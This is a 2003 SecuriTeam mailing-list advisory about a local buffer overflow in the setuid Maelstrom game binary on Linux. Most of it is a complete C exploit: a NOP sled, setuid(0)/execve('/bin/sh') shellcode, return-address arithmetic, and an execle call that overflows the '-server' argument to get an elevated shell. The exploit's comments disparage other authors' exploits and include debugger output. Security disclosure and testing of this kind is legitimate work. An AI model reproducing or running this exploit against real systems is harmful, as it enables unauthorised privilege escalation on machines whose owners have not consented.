[EXPL] Maelstrom Vulnerable to a Local Buffer Overflow (Another Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/31/03

  • Next message: SecuriTeam: "[NT] Personal FTP Server Saves Passwords in the Clear" 
    To: list@securiteam.com
Date: 31 May 2003 11:34:00 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Maelstrom Vulnerable to a Local Buffer Overflow (Another Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article:
    <http://www.securiteam.com/unixfocus/5OP0I2AA0S.html> Maelstrom Vulnerable
    to a Local Buffer Overflow, there is a buffer overflow vulnerability in
    Maelstrom which allow local attacker arbitrary code execution.
    Exploitation of the vulnerability will allow users to gain elevated
    privileges (as the program is setuid 'games'). The following exploit code
    can be used to test your system for the vulnerability.

    DETAILS

    Exploit:
    /** Maelstrom Local Exploit
     ** By: Dvdman@l33tsecurity.com
     ** Greetz: Sam,flatline,democow,#!l33tsecurity@efnet
     ** NOTES: I was inspired to write this because none of the others posted
    to packetstorm worked.
     ** The authors who wrote the exploit obviosuly didnt know how to build a
    buffer and was corruping the return address
     
     ** SIDE NOTES: * /usr/bin/Maelstrom local exploit coded by c0wboy (c)
    0x333 Outsiders Security Labs / www.0x333.org
     ** Bassically a buffer overflow example code ripped and changed. here is
    output from it I doubte they even tested it.
        Program received signal SIGTRAP, Trace/breakpoint trap.
         0x40001e60 in _start () at rtld.c:158
             158 rtld.c: No such file or directory.
            in rtld.c
          (gdb) c
          Continuing.
          Couldn't resolve host name for 3¿Åÿÿ¿
           Program received signal SIGSEGV, Segmentation fault.
           0xfffac8bf in ?? ()

           You May Ask WHY?

        they built the buffer or tried to at least and added to the very end
    screwing up the alligment.
        out[0] = '3';
        out[1] = '@';
        out[2] = '3';

    Then i saw maelst0x00.c.gz 1289 May 23 02:13:18 2003
    bfd34d743e37c8ee7b7f8490438cadb2
    Again doesnt do *** I wont go into this one hee

    Then I saw one by akaccess it seems to work its a nice beggining at least
    he didnt rip his perl code =)
    but they player overflow is the same as the server overflow so blah. But
    at least his works.

    ********* HAVE FUN WITH THIS WORKING EXPLOIT THAT DOESNT DO JACK ***
    *********************************

     **
     **/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <getopt.h>
    #include <sys/errno.h>

    #define FUN "./Maelstrom"

    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

        /* SETUID(0) SHELLCODE LINUX */
        "\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc"
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
        "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
        "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

    int main(int argc, char **argv) {
        int eip[4];
        int i,x,b;
        long ret;
        char buffer[40000];
        char buffer2[100];
        char *env[2];
        char *args[4];

        ret = 0xbffffffa - strlen(shellcode) - strlen(FUN);
        if (argc > 1) ret = ret + atoi(argv[1]);

        /* put in env */
        env[0] = shellcode;
        env[1] = NULL;

        eip[0] = (ret & 0x000000ff);
        eip[1] = (ret & 0x0000ff00) >> 8;
        eip[2] = (ret & 0x00ff0000) >> 16;
        eip[3] = (ret & 0xff000000) >> 24;

        bzero (buffer, sizeof (buffer));
        buffer[0] = '3';
        buffer[1] = '@';
        buffer[2] = '1';

        for(i = 3, b = 0; i < 9001; i++, b++) {
            if(b == 4) b = 0;
            buffer[i] = (char)eip[b];
        }
        execle (FUN, FUN, "-server", buffer,NULL,env);
        return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dvdman@l33tsec.no-ip.org>
    dvdman.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Personal FTP Server Saves Passwords in the Clear"